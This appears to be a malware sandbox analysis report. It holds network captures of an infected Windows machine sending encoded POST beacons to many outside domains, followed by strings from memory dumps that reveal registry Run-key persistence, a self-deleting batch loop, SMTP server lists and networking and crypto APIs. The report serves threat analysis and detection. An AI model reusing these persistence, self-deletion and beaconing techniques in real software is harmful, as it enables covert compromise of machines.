48EpNofhgqHqi8uPIKdA2ZlQqxGAJn4dnxq7C8EaduYpPjnGDiiLHIuMW jfaz7L
wPP4126u9NzQBdtBLJYxRo678ZVH5Sibken7nA RdZkryf8K6bv05cx50aEuEwiG
h QVguxssIKn3y66KXHtvfj/jInnejVql4MH2aXV2F2v0xY2imlFzW9wwChF6bFj
VdUy3AzfSbH8c1tw7fd9w3/0t/eradVY1Het5aXMp9t3jnvVxlc6MbkTtMka ajm
IeuxzLElxGnEe7xh1hj8DETPn1Q2XUjzdh62ikSUcP9nj1PDflV9wRPbtAvCl6G/
f1gYC92rZtjKaZELJw==
HTTP/1.1 406 Not Acceptable
Date: Sat, 12 Apr 2014 14:41:42 GMT
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8i DAV/2 FrontPage/5.0.2.2635 mod_bwlimited/1.4 mod_auth_passthrough/2.1
Content-Length: 13
Connection: close
Content-Type: text/html; charset=iso-8859-1
Access Denied..
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 570
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sztartufi.com
Connection: Keep-Alive
Cache-Control: no-cache
PHNuj9x3BaouFIyQB7HzwG9bH3j0OWaP0B41SpS0jqoS9gz wMp2VTaWPFQnP8X
IFJZS0sfZ9CnuB SuF LZIepvaaSRtHK1DFoVFUoSYHHQydYXFcYMj0mIA/elMqr
FX0PIvIT KE0F74dAnm/uYzZuCUVdaDMHWWmLVMWsI4eddlKWQkdnRcriHGG1 O5
jwvZBiCGuM3T/pu3hhwCKP8zi/5bsdeaLsTkLlfEBHXYHzfO3TikUVFRldXm7DF7
TZswQtxm/yRs1tA3k2QS8PEplQCmoh6EbrYzNUCah8CHXeqzRUowt08KVI5LiXZM
k8mXwJ4GkfoeQ7wVxy/EpYNyqqhX7S644q ph2JyHZ 9ljzfa6UhIg1tJxnnx6H3
FDuDk7puv/uUgyUJpWMGIygQWu0iPNK9zfPJQNFN1ped9Z9r5I/0jsg/eoGX3CrX
oRA1Hfq0 Sypu4nisM8zsqiv40f/LQuUak6I8xZMoiAwG7uEO0M2k8wLT2CRISMQ
eXLRIkCEmNxMhedLvX9Puw5C9U7JdjVdkcEG0tas
HTTP/1.1 403 Forbidden
Server: nginx
Date: Sat, 12 Apr 2014 14:41:27 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
<html>..<head><title>403 Forbidden</title></head>..<body bgcolor="white">..<center><h1>403 Forbidden</h1></center>..<hr><center>nginx</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->....
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 480
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: saios.net
Connection: Keep-Alive
Cache-Control: no-cache
LDfAAFbK6qE2HY9sMX1fxPmh1oj2fuK36iMv5odCMkEVIybzGZjggu8ZMIW/lxnb
Vf6blDpU8hUVh8MCuoFEkwJowI/Gv67TikrOhUAZL/h63xJRXcvG0oN0bDr11X/M
4jkqPEK2Wim d/Bselkcd0ywChuL073qNK/qCMVgES8gUEs2pA0uKaspvI tu8qq
RALqWLH0QLLyaeSmtwymjhMrltrYZvx6d9PD64pDgFuXf1/EN9NoSja3aNi4HXHC
4dyyHAyr5gbZJ4QvoUozi39RphRZKTKEvU6Y/WJdzoTQ7iTeAGARwLkpwuA8vM5V
1RUQQg8SsviO9VT7v6f9G9xiUTNU3Yb6nsLbx4nK3WxbXJQID0fKee7VrqDBttQA
LCEogZmA4O0ZFLIlYQMlJAe9ZhHl4sDy6WwlCwKkeiWtEdDx7agnaHPTsl0O3Cxm
6jvA8FFs81GcPZXE
HTTP/1.1 302 Found
Date: Sat, 12 Apr 2014 14:40:29 GMT
Server: Apache
Location: hXXp://VVV.saios.net/
Content-Length: 205
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>302 Found</title>.</head><body>.<h1>Found</h1>.<p>The document has moved <a href="hXXp://VVV.saios.net/">here</a>.</p>.</body></html>...
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 450
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ezmedi.com
Connection: Keep-Alive
Cache-Control: no-cache
RGuRot1qR7M4LsRQFG44OxYjNYeLo4 AYeFP77DH2XX5yRBNo8aKxP8T1bfyoH51
rrJiEAob2e3gC2aLBKK4V2FM fN1/OqJGyYKmLbJfyqnD9TeMnN J5L9LZe4FOOU
ETaSb wN1Nfq5Z5LCYQ5ieaXZyys5YvCQUvDsWF/mmxgkj8ySVpQ6104PK8alzCf
W 5ytAAyAejsd /n1HSqLDe6lNPmFjlOSsMWRcOmnsNnEk13D9Z4XPZVYcmjoeGE
H7g8wG4JTDGKCMiqZitjrdUOHnjvBSTYP8YXdHVAkcIvaIqtcExwey3NgER7Hdux
rBiiN5LxzWaPEA9C ypgDzURwmNqhwXCCA8P/PtcnkL5SKjYXCU3EN3ivGkW7oPB
iVA5H/dTANmgd4RrSKyRSCKMDVYw9cKvFaSGJ 9v58gBa/dzK0FS
HTTP/1.1 403 Forbidden
Date: Sat, 12 Apr 2014 14:41:46 GMT
Server: Microsoft-IIS/5.0
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
37..[an error occurred while processing this directive].. ..90.... You don't have permission to access the requested directory.. There is either no index document or the directory is read-protected... ..2......34..[an error occurred while processing this directive]...0..
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 542
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rewardhits.com
Connection: Keep-Alive
Cache-Control: no-cache
cstPH7Vo3axklY3gHGISda5WsyFDkl6ruVBpOE1TDqWntYh6o/5jSw WqMxCH9B7
8eJ2Fq1oFJZgeBsPdaBODh9xVB/rVRjuPUn9MF/I9u 2Bo5CZia Qhp JIlOZlY7
u/azPC 3L9N7gA9CYsPSTITpT5ZJkGmyrN7PfX3jhGit yOb73EQnu/LLTq4Qn/M
wpUup5XqYtc8q/8wEqVzklmkJW dcmUKJjr9WL3NVoDHT/C6t tG40uLUKajkLAx
vd7HG3wptWOcBVkH2pfbVguxvkWGJz A/zLIKgVEtzkgRJ4M10ycvBRLCsTn4Swj
zFh68wRaAD56kaPV3JhUg8g4o8/cSbTxBksDWghWuqtBVTXPWscy9XHpexfcOQ9n
PVA5ArGEvnEIJgCDg3xq9EnzhhJCmPgFvfi1jpJZX1NYuIVBs5xBgVt5pFsDuls8
p6x320Sdgaih0SJDlU2wJqVuFAj2DaGF3JGDLBSdWm6tI3Gzx3I6VsRayc/fVHqq
eo8a8PutTQ==
HTTP/1.1 301 Moved Permanently
Server: nginx/1.4.2
Date: Sat, 12 Apr 2014 14:41:26 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 382
Connection: keep-alive
Location: hXXp://VVV.teknorhino.com/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="hXXp://VVV.teknorhino.com/">here</a>.</p>.<hr>.<address>Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.17 Server at rewardhits.com Port 80</address>.</body></html>...
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 133
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: qistech.com
Connection: Keep-Alive
Cache-Control: no-cache
...-~7..4.a0.`.1..(3V..4..5..S7xH.8...:...;...=jgx> ..?..?A.%.BB..D.NjE...F.x1H=.I...Ks..LI1.M..<O..:.^S6R...W.~.T....k..W.?.Y.7.[.
HTTP/1.1 302 Found
Date: Sat, 12 Apr 2014 14:42:05 GMT
Server: Apache
Location: hXXp://VVV.qistech.com/
Content-Length: 207
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>302 Found</title>.</head><body>.<h1>Found</h1>.<p>The document has moved <a href="hXXp://VVV.qistech.com/">here</a>.</p>.</body></html>...
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 52
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: benefits-inc.com
Connection: Keep-Alive
Cache-Control: no-cache
j*/2 ..3.S.4..Y6B}.7..!9...:d;.;..K=.d.>...@<.vA.".B
HTTP/1.1 500 Internal Server Error
Date: Sat, 12 Apr 2014 14:42:04 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 251
Connection: keep-alive
Keep-Alive: timeout=30
Server: Apache/2
X-Powered-By: PHP/5.2.17
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
<!DOCTYPE html>.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">.<head>.<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />..<title>Database Error</title>..</head>.<body>..<h1>Error establishing a database connection</h1>.</body>.</html>...
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 512
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: hostphd.com.br
Connection: Keep-Alive
Cache-Control: no-cache
M6p2WCqBmqHs48u7DT7Yne2H6oNaoL90/sXjJM0VBGK/RhAcwekMwyHfauEE24Pb
dZHTE/SX8xxDK1FAoq98WFQ4NIWAbTEEg0WStuRGWqcsudFBthxx1d5VVOa7Y3Hn
ssK/xXd0YEYrAm1fhp6hrAzYRMjeq2Wf9vSS/rYc0CxKCrvo3bUojX3Qrg5vBb1u
csA7yD05wnN8xCQ53Ztr4jXGPjCIepQ/sgCEgjjjgdVFieYWdMPHQcW894CbS7Bn
icnto x7YLixUeU1dTEiYFgeXSAfHukOS m5cc1x7fkC8C6wL7KAWBGnIORb8VrU
pfmX6V0poWE0MxheyDLYuLVeDEEkUyOxYFaos/4tfF3NB9vX28ZBuMVSGMQkSVqg
CA4OZ1QGCwzMEDSBDKO1rNzIRFYOiMo1pK5aGm4A/lKc82Z9gKDz 7aqn3eUQx3J
vUWGIBMQqzjJ2quu6Dd1BJDU7uc/k8r TBkXGMzYffhu7Q==
HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:40:26 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
Last-Modified: Sun, 23 Mar 2014 15:46:09 GMT
Content-Type: text/html
Content-Length: 24609
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">.<head>.<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">.<title>Hospedagem de Sites Ilimitada, Revenda de Hospedagem, Hospedagem de Sites Windows, Linux , SEO ,HOSTPHD</title>.<meta http-equiv="Content-Language" content="pt-br" />.<meta name="TITLE" content="Hospedagem de Sites Ilimitada, Revenda de Hospedagem, Hospedagem de Sites Windows, Linux , SEO ,HOSTPHD" />..<meta name="KEYWORDS" content="Hospedagem de Sites, Ilimitada, trafego ilimitado,Revenda de Hospedagem, Windows, Linux, Streaming, Vps, dedicados, dominios, patrocinios,construtor, revenda ilimitada, whmcs, construtor sites"/>..<meta name="DESCRIPTION" content="Hospedagem de Sites Ilimitada, trafego ilimitado,Revenda de Hospedagem, Hospedagem de Sites Windows, Linux, Streaming, Vps, dedicados, dominios, patrocinios,construtor" />..<meta name="ABSTRACT" content="Hospedagem de Sites: Hospedagem de Sites, Planos de Revenda, Servidores Dedicados, Hospedagem de Sites Linux, Hospedagem de Sites Windows, Planos de Revenda Linux, Planos de Revenda Windows, Revenda Windows, Revenda Linux, Servidor Dedicado Linux, Servidor Dedicado Windows, Servidores Dedicados Windows, Servidores Dedicados Linux, Servidores Dedicados Linux com cPanel, Servidores Dedicados Windows com Plesk, Registros de Dom.nio Internacional, Re
<<
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 558
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: justconnect.co.za
Connection: Keep-Alive
Cache-Control: no-cache
g 514cJmzZ9YvQo9tXfAOUW1Rn/SMa/FFjG76dyi16euQ1jlc8KnYCbztEKryKoT
LxAM37IZJztGo/vLX5n/dfN6QpP1 kpOj7ncfXzra0jTlAQWpO 4I/KKSbPKWz2n
eZPVrb8 ieYDh92V5X50h9smD ALLPLvKI2cQqdMdHy4LGzuhympMsftEFHlEDbw
GPKEuxhh7GdZ0VY/ZHQZF7fAo2P3ugPg4V85cknQASuXWWF4ETigysVZBWEJknIb
c/YJsL8Qp6IUAii3PEXWNuWpLRGP5jqqu4iVhL4mVok84l902tX8Rqr9kfy9UKp8
UaUB0xyvRuxlbqKk3o sveGgur3eP5AfO2w79oxQLlm6cxbzle0nEzLrWOLz3pcg
5zD9KXuH3DzvlDdVyO71GIockBlJqiYBfpiAst0TcXtEFLTSN3UJ9WQfD4R0sKT9
KK82QUtzkO5Bd9MxcIZmoGU6YyBV396WPfyEQmrng39mlJpoYHPjFSoRgPSPK5wb
svXH9HCl31mnIJasmmh5Qc8rzA==
HTTP/1.1 301 Moved Permanently
Server: nginx/1.1.19
Date: Sat, 12 Apr 2014 14:40:16 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: hXXp://VVV.justconnect.co.za/
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.1.19</center>..</body>..</html>....
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 508
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: cgc-england.com
Connection: Keep-Alive
Cache-Control: no-cache
YNTuWPZH0Z81 RKCUZ7Bw5kQJdYWHZGyiqu4sceIttvp7L3ZYZq1SX8FFW5cQn7D
LXHUhz0Dhbh/Mpx9/o3ynocEQn3OKrNlFu9hKGMA3l14PZD9HNYPL18UYu48XYPn
gm7PGH26Jmtbs5rJPeR CcVKhRKzRaXzcPvJt6eCRxzO/sx18cKGNhLz42ad1Bz0
XAGNId5taMYWN7WnZFH22XSNeDgnmz9LQmPfD7Ho53WUcJVbBtMW6phW2/ijScrl
BeUW7FVQ8GC7Wk4ugpLKbwQXV23hW75N 0kwwwa5Jci w0J93 yhHOt/8dZ z Sg
CYJM1lpPDoUEHkYLYibG8vC0VFM9/oczrBBxPW48Divlp/b8hlO2aj0xzcoFluE2
zUTB9GWYj8VHv8ijspba1wwF K15KXDCcQ2EBm9x7Fswpd 0LftqEPi2m3Nk ilr
CJO9xM9XKBW9eSWUWzIVl8YXwvAd/A1N0GPCk4s6Vw==
HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:40:16 GMT
Server: Apache
Last-Modified: Fri, 17 Jan 2014 11:51:26 GMT
Accept-Ranges: bytes
Content-Length: 13968
Keep-Alive: timeout=2, max=90
Connection: Keep-Alive
Content-Type: text/html
Content-Language: fr
<!DOCTYPE html>.<html lang="fr-FR" prefix="og: hXXp://ogp.me/ns#" class="no-js csstransforms no-csstransforms3d csstransitions">.<head>.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta charset="utf-8">.....<title>CAMBRIDGE GARDENS COLLEGE | English Language School in Hastings</title>...........<!-- Mobile Specific Metas. .================================================== -->..<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> ....<link rel="profile" href="hXXp://gmpg.org/xfn/11">..<link rel="alternate" type="application/rss xml" title="RSS 2.0" href="hXXp://VVV.cgc-england.com/feed/">..<link rel="alternate" type="text/xml" title="RSS .92" href="hXXp://VVV.cgc-england.com/feed/rss/">..<link rel="alternate" type="application/atom xml" title="Atom 0.3" href="http://VVV.cgc-england.com/feed/atom/">..<link rel="pingback" href="hXXp://VVV.cgc-england.com/xmlrpc.php">..<link rel="shortcut icon" href="flavicon.png" type="image/gif">............<meta name="robots" content="noindex,nofollow">..<!-- This site is optimized with the Yoast WordPress SEO plugin v1.4.13 - hXXp://yoast.com/wordpress/seo/ -->.<link rel="canonical" href="hXXp://VVV.cgc-england.com/">.<meta property="og:locale" content="fr_FR">.<meta property="og:type" content="website">.<meta property="og:title" content="CAMBRIDGE GARDENS COLLEGE - English Language School in Ha
<<
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 254
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: tsu-box.com
Connection: Keep-Alive
Cache-Control: no-cache
........!`..2. .C.6.T}K.e.`.v;v......_...$.......H-...B...X.%fm.6...G$..e....H.......l ...N..*K...`....N.....'..6...08.Vs...i.(.......m..r.......0.......
.%.9.6.N.G>d.X.y.i...z[...........x...=....B..aW...l..
:..KD..\...m...~a...&5...J..Jy..........g
HTTP/1.1 500 Internal Server Error
Date: Sat, 12 Apr 2014 14:42:12 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 12 Apr 2014 14:42:13 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
3a..<!DOCTYPE html>.<html xmlns="hXXp://VVV.w3.org/1999/xhtml"..57..>.<head>.<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />..<title>..1b...............................1e..</title>..</head>.<body>..<h1>..27...........................................16..</h1>.</body>.</html>...0..
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.biurimex.pl
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 3966
Content-Type: text/html
Date: Sat, 12 Apr 2014 14:42:04 GMT
Last-Modified: Fri, 26 Jul 2013 10:07:38 GMT
Server: IdeaWebServer/v0.80
<html>..<head>..<meta http-equiv=Content-Type content="text/html; charset=windows-1250">..<meta name=Generator content="Microsoft Word 11 (filtered)">..<title> </title>..<style>..<!--.. /* Font Definitions */.. @font-face...{font-family:Tahoma;...panose-1:2 11 6 4 3 5 4 4 2 4;}.. /* Style Definitions */.. p.MsoNormal, li.MsoNormal, div.MsoNormal...{margin:0cm;...margin-bottom:.0001pt;...font-size:12.0pt;...font-family:"Times New Roman";}..h1...{margin-right:0cm;...margin-left:0cm;...font-size:24.0pt;...font-family:"Times New Roman";...font-weight:bold;}..a:link, span.MsoHyperlink...{color:blue;...text-decoration:underline;}..a:visited, span.MsoHyperlinkFollowed...{color:purple;...text-decoration:underline;}..p...{margin-right:0cm;...margin-left:0cm;...font-size:12.0pt;...font-family:"Times New Roman";}..@page Section1...{size:595.3pt 841.9pt;...margin:70.85pt 70.85pt 70.85pt 70.85pt;}..div.Section1...{page:Section1;}..-->..</style>..</head>..<body lang=PL link=blue vlink=purple>..<div class=Section1>..<p class=MsoNormal align=center style='text-align:center'><img width=1100..height=733 src="index_pliki/image001.jpg"></p>..<p class=MsoNormal> </p>..<p class=MsoNormal> </p>..<p class=MsoNormal> </p>..<p class=MsoNormal align=center style='text-align:center'><span..style='font-size:36.0pt;color:red'>STRONA W BUDOWIE!</span></p>..<p class=MsoNormal a
<<
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 562
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: icigrain.com
Connection: Keep-Alive
Cache-Control: no-cache
zS6Ivowp3aSdrnAK99fjyJ/k3kJk9RH3gIvnK2niMMPM4vg9lV2OW5iN 8Ra2tJh
pJURHd9S6UXzd/tuPpKPmA07BSlOCX/rj2yH46d92z3uZdWnZH8Hq ZOatC 9qQz
H0D/o5FR5c o3LGggYLF9nL cA9MrVr9u0veWNN5BBrkrAM7ir5agh00g/yNxl/
tT4IjYS NUoGMLA03S8WWrBiiIUGoWjQ4KYSjZA0WZYdCXzLZxlnIDx3DhH3hDus
SkbQ700DHvxGN/dKTwkQPGZSidupXYme/8gMPCkMT4ZWlu6phgu7JFPEfLwlMzer
xmPj8Po8azhssgcSDzRreqKMpKL/STQRsvdXhjBdj iIAGVMCzX2Rmk1se9zOCYF
3Ei3MEgZtCz7MNZh2HvKDR2Pcx4a8PAsPzbgLZaMo/F5 iB2cdnhTOOiZ77ZImR8
wdlOnfGPqK8IH4bR2/5oID3LsQdjjtSr3vF4LCoMtpZLyBDiSvaZ3c66cFXqLnk7
7STlLOX3IPgDFsJD/wvkDIEKyPFpKA==
HTTP/1.1 301 Moved Permanently
Date: Sat, 12 Apr 2014 14:40:46 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
X-Powered-By: PHP/5.4.22
Set-Cookie: PHPSESSID=16cee3056eb3b31f92edc74b47b72b7f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: hXXp://VVV.icigrain.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.icigrain.com/
Content-Length: 0
HTTP/1.1 301 Moved Permanently..Date: Sat, 12 Apr 2014 14:40:46 GMT..Server: LiteSpeed..Connection: Keep-Alive..Keep-Alive: timeout=5, max=100..X-Powered-By: PHP/5.4.22..Set-Cookie: PHPSESSID=16cee3056eb3b31f92edc74b47b72b7f; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GMT..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0..Pragma: no-cache..X-Pingback: hXXp://VVV.icigrain.com/xmlrpc.php..Content-Type: text/html; charset=UTF-8..Location: hXXp://VVV.icigrain.com/..Content-Length: 0..
Map
Strings from Dumps
JRY7B2.tmp_3796:
.text
.text
`.rdata
`.rdata
.rsrc
.rsrc
9m,.spLoadImageA
9m,.spLoadImageA
R:\jfndh8883.dat
R:\jfndh8883.dat
user32.dll
user32.dll
kernel32.dll
kernel32.dll
gdi32.dll
gdi32.dll
zxc098iuser32.dll
zxc098iuser32.dll
%,'gdi32.dll
%,'gdi32.dll
[t.Kx
[t.Kx
WG.OK
WG.OK
.hM-n
.hM-n
&n%cv|n
&n%cv|n
q*.AglS
q*.AglS
x;P.IB
x;P.IB
.sd~'\B4W
.sd~'\B4W
&sourly
&sourly
thoughts compass
thoughts compass
&Passion search
&Passion search
&Leahy's unascertained
&Leahy's unascertained
&windows
&windows
pillars halted trying certainly
pillars halted trying certainly
sports
sports
&report located
&report located
&ports
&ports
&Alderman KEYES
&Alderman KEYES
4,1,4,24
4,1,4,24
welled.exe
welled.exe
JRY7B2.tmp_3796_rwx_04000000_0000F000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
%s\%s.exe
%s\%s.exe
Content-Length: %d
Content-Length: %d
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
\system32\svchost.exe
\system32\svchost.exe
software\microsoft\windows\currentversion
software\microsoft\windows\currentversion
del %s
del %s
if exist %s goto :repeat
if exist %s goto :repeat
http://%s
http://%s
kernel32.dll
kernel32.dll
smtp.compuserve.com
smtp.compuserve.com
mail.airmail.net
mail.airmail.net
smtp.directcon.net
smtp.directcon.net
smtp.sbcglobal.yahoo.com
smtp.sbcglobal.yahoo.com
smtp.mail.yahoo.com
smtp.mail.yahoo.com
smtp.live.com
smtp.live.com
CRYPT32.dll
CRYPT32.dll
PSAPI.DLL
PSAPI.DLL
USERENV.dll
USERENV.dll
IPHLPAPI.DLL
IPHLPAPI.DLL
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCrackUrlA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
CryptImportKey
CryptImportKey
CryptDestroyKey
CryptDestroyKey
CryptExportKey
CryptExportKey
CryptGenKey
CryptGenKey
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
http://%s/
http://%s/
InternetOpenUrlA
InternetOpenUrlA
zc)%c
zc)%c
-9276543007814
-9276543007814
%Documents and Settings%\%current user%\sufkywiddeax.exe
%Documents and Settings%\%current user%\sufkywiddeax.exe
53595`5}5
53595`5}5
9-9K9}9
9-9K9}9
?$?(?,?0?4?
?$?(?,?0?4?
JRY7B2.tmp_3796_rwx_08900000_00012000:
.text7d/
.text7d/
~.rdata
~.rdata
.Lv~EF4)
.Lv~EF4)
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
%s\%s.exe
%s\%s.exe
Content-Length: %d
Content-Length: %d
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
\system32\svchost.exe
\system32\svchost.exe
software\microsoft\windows\currentversion
software\microsoft\windows\currentversion
del %s
del %s
if exist %s goto :repeat
if exist %s goto :repeat
http://%s
http://%s
kernel32.dll
kernel32.dll
smtp.compuserve.com
smtp.compuserve.com
mail.airmail.net
mail.airmail.net
smtp.directcon.net
smtp.directcon.net
smtp.sbcglobal.yahoo.com
smtp.sbcglobal.yahoo.com
smtp.mail.yahoo.com
smtp.mail.yahoo.com
smtp.live.com
smtp.live.com
CRYPT32.dll
CRYPT32.dll
PSAPI.DLL
PSAPI.DLL
USERENV.dll
USERENV.dll
IPHLPAPI.DLL
IPHLPAPI.DLL
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCrackUrlA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
CryptImportKey
CryptImportKey
CryptDestroyKey
CryptDestroyKey
CryptExportKey
CryptExportKey
CryptGenKey
CryptGenKey
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
http://%s/
http://%s/
InternetOpenUrlA
InternetOpenUrlA
zc)%c
zc)%c
-9276543007814
-9276543007814
53595`5}5
53595`5}5
9-9K9}9
9-9K9}9
?$?(?,?0?4?
?$?(?,?0?4?
@.reloc
@.reloc
@595`5}5
@595`5}5
-9K9}
-9K9}
KERNEL32.DLL
KERNEL32.DLL
svchost.exe_1876:
.text
.text
`.data
`.data
iphlpapi.dll
iphlpapi.dll
inetcomm.dll
inetcomm.dll
operator
operator
KERNEL32.DLL
KERNEL32.DLL
kernel32.dll
kernel32.dll
mscoree.dll
mscoree.dll
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
EX8^/u$9^%u
EX8^/u$9^%u
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
DNSAPI.dll
DNSAPI.dll
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
GDI32.dll
GDI32.dll
ole32.dll
ole32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
GetCPInfo
GetCPInfo
